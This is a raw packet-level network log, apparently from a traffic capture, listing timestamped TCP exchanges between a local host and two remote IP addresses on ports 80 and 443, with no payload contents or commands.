                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.863143921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.863200903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.863265991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.863320112 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.864263058 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.864320040 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.864392996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.864442110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.865345955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.865400076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.865403891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.865449905 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.866416931 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.866477966 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.866545916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.866610050 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.867511988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.867578983 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.867629051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.867676020 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.868705988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.868788004 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.868799925 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.868849039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.869710922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.869760990 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.869837046 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.869888067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.870841026 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.870894909 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.870917082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.870973110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.871891975 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.871958971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.871984005 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.872040033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.872966051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.873025894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.873064995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.873122931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.874042988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.874099970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.874145031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.874197960 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.875158072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.875221014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.875226974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.875294924 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.876250029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.876307964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.876338005 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.876389027 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.877319098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.877376080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.877415895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.877468109 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.878396988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.878467083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.878571987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.878623009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.879529953 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.879585028 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.879625082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.879667044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.880592108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.880646944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.880692959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.880740881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.881690025 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.881751060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.881797075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.881849051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.882754087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.882838964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.882888079 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.882941961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.883949995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.884006977 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.884026051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.884103060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.884938002 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.884994984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.885035992 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.885086060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.886166096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.886219978 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.886286974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.886338949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.887121916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.887177944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.887236118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.887286901 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.888230085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.888286114 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.888328075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.888377905 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.889286041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.889363050 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.889413118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.889462948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.890384912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.890438080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.890527964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.890579939 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.891480923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.891535044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.891582012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.891634941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.892568111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.892632008 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.892671108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.892730951 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.893587112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.893640041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.923924923 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.924535036 CET49780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.924565077 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.924998999 CET49780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.925005913 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.046997070 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.047080994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.047089100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.047143936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.047440052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.047482014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.047493935 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.047527075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.048367977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.048420906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.048548937 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.048599958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.049412966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.049464941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.049611092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.049659014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.050486088 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.050534010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.050591946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.050646067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.051662922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.051726103 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.051738024 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.051785946 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.051810026 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.052668095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.052717924 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.052784920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.052826881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.053740978 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.053788900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.053916931 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.053963900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.054917097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.054965973 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.055042028 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.055097103 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.056016922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.056068897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.056109905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.056157112 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.057111979 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.057159901 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.057311058 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.057367086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.058250904 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.058305979 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.058368921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.058417082 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.059202909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.059251070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.059290886 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.059343100 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.060281992 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.060331106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.060386896 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.060436010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.061403990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.061461926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.061537981 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.061585903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.062469006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.062516928 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.062560081 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.062611103 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.063637018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.063659906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.063687086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.063702106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.064714909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.064768076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.064860106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.064909935 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.065819979 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.065867901 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.065916061 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.065963984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.066807032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.066854954 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.066883087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.066930056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.067998886 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.068049908 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.068109035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.068159103 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.069052935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.069104910 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.069196939 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.069246054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.070135117 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.070188046 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.070293903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.070343971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.071188927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.071244001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.071291924 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.071342945 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.072423935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.072505951 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.072556973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.072607994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.073345900 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.073405027 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.073467970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.073518991 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.074466944 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.074520111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.074599028 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.074651003 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.075548887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.075593948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.075659990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.075706005 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.076649904 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.076702118 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.076733112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.076782942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.077723026 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.077769995 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.077837944 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.077884912 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.078943968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.078989983 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.079041958 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.079092026 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.079991102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.080054045 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.080248117 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.080301046 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.081010103 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.081062078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.081145048 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.081195116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.082060099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.082109928 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.082174063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.082221985 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.083162069 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.083205938 CET4977080192.168.2.431.41.244.11
